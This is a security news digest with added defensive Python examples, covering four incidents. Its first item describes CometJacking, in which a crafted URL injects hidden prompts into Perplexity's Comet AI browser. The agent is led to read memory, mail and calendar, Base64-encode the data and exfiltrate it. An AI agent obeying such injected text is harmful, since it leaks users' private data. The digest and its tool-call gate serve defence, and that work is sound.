Intro Snapshot
Today’s threats show how trust models are fracturing—AI agents become insiders, firewall login portals face sweeps, developer infrastructure is compromised, and ransom gangs amplify their reach through bold claims. The battleground is no longer just endpoints—it’s logic, identity, and ecosystems.
1) CometJacking: One click turns Perplexity's Comet into a data exfiltration tool
Full URL: https://thehackernews.com/2025/10/cometjacking-one-click-can-turn.html
Researchers revealed CometJacking, where a specially crafted URL injects hidden prompts into the Comet AI browser. That prompt can command the agent to access memory, connected services (Gmail, Calendar), obfuscate data via Base64, then exfiltrate—all without credential theft.
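The defensive point of the CometJacking description is that text arriving through a URL or a fetched page is data, not an instruction, and that an agent's outbound actions should be gated on where the request came from and on what it carries. The following is an added example (not Comet's or Perplexity's code; the tool names, the ToolCall structure and the policy_check function are assumptions for illustration) of a small policy gate that denies calls to connected services when they originate from untrusted content, and flags egress arguments that carry a Base64-wrapped payload of the kind described above.

```python
import base64
import re
from dataclasses import dataclass

# Hypothetical tool names; a real agent framework would use its own catalogue.
# Tools that touch memory or connected services (mail, calendar).
SENSITIVE_TOOLS = {"gmail.send", "gmail.search", "calendar.read", "memory.read"}
# Tools that move data out of the agent's boundary.
EGRESS_TOOLS = {"gmail.send", "http.post"}
# Only instructions typed by the user may drive sensitive tools; text that
# came from a URL parameter or a fetched page is treated as untrusted data.
TRUSTED_ORIGINS = {"user"}

# A long run of Base64 alphabet characters, optionally padded.
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


@dataclass
class ToolCall:
    tool: str
    origin: str   # "user", "url_param", "page_content", ...
    args: dict


def looks_like_encoded_blob(text: str, min_bytes: int = 48) -> bool:
    """True when text carries a Base64 run that decodes to a sizeable payload."""
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:   # binascii.Error is a ValueError subclass
            continue
        if len(raw) >= min_bytes:
            return True
    return False


def policy_check(call: ToolCall) -> list[str]:
    """Return the reasons to deny this call; an empty list means allowed."""
    reasons = []
    if call.tool in SENSITIVE_TOOLS and call.origin not in TRUSTED_ORIGINS:
        reasons.append(f"{call.tool} requested by untrusted origin {call.origin!r}")
    if call.tool in EGRESS_TOOLS:
        for name, value in call.args.items():
            if isinstance(value, str) and looks_like_encoded_blob(value):
                reasons.append(f"argument {name!r} carries an encoded payload")
    return reasons


# Constructed sample data standing in for calendar entries the agent can read.
CONSTRUCTED_CALENDAR = (
    "2025-10-06 09:00 Board meeting; 2025-10-06 14:00 Incident review; "
    "2025-10-07 10:00 Vendor call"
)


def demo() -> dict:
    """Run the gate over a benign call and an injected exfiltration attempt."""
    benign = ToolCall("calendar.read", "user", {})
    blob = base64.b64encode(CONSTRUCTED_CALENDAR.encode()).decode()
    injected = ToolCall(
        "gmail.send", "url_param",
        {"to": "collector@example.invalid", "body": blob},
    )
    return {"benign": policy_check(benign), "injected": policy_check(injected)}


if __name__ == "__main__":
    for label, reasons in demo().items():
        print(label, "->", "allowed" if not reasons else reasons)
```

The origin tag is the part that matters: it has to be attached by the component that fed the text to the model (URL parser, page fetcher), not inferred from the text itself, otherwise the injected prompt can simply claim to be the user.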
2) Massive scanning spikes on Palo Alto portal endpoints
Full URL: https://thehackernews.com/2025/10/scanning-activity-on-palo-alto-networks.html
Threat intelligence traces a dramatic surge—~500% increase—in IPs scanning Palo Alto Networks login portals in a short window. The pattern suggests reconnaissance ahead of targeting NGFW/SSL VPN systems.
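A surge of this shape is detectable on the defender's side from portal access logs alone: count distinct source IPs hitting the login path per window and compare each window against the median of earlier windows. The following is an added example (not from the article or from Palo Alto Networks; the log field layout, the /portal/login path and the function names are assumptions for illustration) that builds constructed log lines, six quiet hours followed by one hour of many new sources, and flags the window whose distinct-source count exceeds the baseline by the chosen factor.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified "YYYY-mm-dd HH:MM:SS src_ip path status" line; this layout is an
# assumption for the example, not a real firewall log format.
LOG_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) (\S+) (\d{3})$")
LOGIN_PATH = "/portal/login"   # placeholder for the appliance's login portal path
EPOCH = datetime(1970, 1, 1)


def make_constructed_logs() -> list[str]:
    """Six quiet hours (10 sources each) then one hour with 60 distinct sources."""
    lines = []
    base = datetime(2025, 10, 3, 0, 0, 0)
    for hour in range(6):
        for i in range(10):
            ts = base + timedelta(hours=hour, minutes=i * 5)
            lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 203.0.113.{i + 1} {LOGIN_PATH} 401")
    for i in range(60):
        ts = base + timedelta(hours=6, seconds=i * 50)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} 198.51.100.{i + 1} {LOGIN_PATH} 401")
    return lines


def sources_per_window(lines, path=LOGIN_PATH, window=timedelta(hours=1)) -> dict:
    """Map each window start to the number of distinct source IPs hitting path."""
    buckets = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # skip malformed lines rather than crash the detector
        ts_text, src, req_path, _status = m.groups()
        if req_path != path:
            continue
        ts = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S")
        start = EPOCH + ((ts - EPOCH) // window) * window
        buckets[start].add(src)
    return {start: len(ips) for start, ips in buckets.items()}


def detect_surges(counts: dict, factor: float = 5.0, min_history: int = 3) -> list:
    """Flag windows whose count is >= factor x the median of all earlier windows.

    A '500% increase' over baseline is a ratio of 6, so factor=5.0 catches it
    with some margin. Each entry is (window_start, count, baseline, ratio).
    """
    alerts, history = [], []
    for start in sorted(counts):
        n = counts[start]
        if len(history) >= min_history:
            baseline = statistics.median(history)
            if baseline > 0 and n / baseline >= factor:
                alerts.append((start, n, baseline, n / baseline))
        history.append(n)
    return alerts


if __name__ == "__main__":
    for start, n, baseline, ratio in detect_surges(sources_per_window(make_constructed_logs())):
        print(f"{start:%Y-%m-%d %H:00}: {n} distinct sources vs baseline {baseline:.0f} ({ratio:.1f}x)")
```

The median baseline keeps one earlier noisy hour from masking the surge; in production the history would span days, and the alert would be joined with the source ASNs and with whether the portal is exposed at all.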
3) Red Hat confirms GitLab consulting instance breach; data copied
Full URL: https://www.redhat.com/en/blog/security-update-incident-related-red-hat-consulting-gitlab-instance
Red Hat publicly acknowledged unauthorized access to a GitLab instance used by its internal consulting division. Some data was copied. Red Hat asserts that the incident did not affect core product infrastructure or its supply chain.
Reports indicate approximately 570 GB across ~28,000 repositories were claimed by the intruders.
4) Medusa group claims exfiltration from Comcast (834 GB demand)
Full URL: https://www.vpnmentor.com/news/hacker-group-medusa-claims-comcast-breach/
The Medusa ransomware gang has claimed that it exfiltrated 834.4 GB of data from Comcast and is demanding a $1.2M ransom. However, Comcast has reportedly denied recognizing the files shown in the sample.
Key Takeaways
Agents are new insider threats: CometJacking shows how AI agents, once granted access, can be commandeered via logic injection.
Recon isn't random: The Palo Alto portal scans are likely precursors to targeted firewall/VPN compromise attempts.
Consulting and internal repos are treasure troves: The Red Hat GitLab breach emphasizes that even non-customer-facing infrastructure holds critical metadata and architecture details.
Ransom claims need validation: Medusa's bold Comcast claim should be scrutinized; sometimes the files shown are misattributed or belong to others.
Access segmentation and token rotation are non-negotiable: After a breach, rotate all tokens, secrets, and service credentials ASAP, especially in connected dev or consulting systems.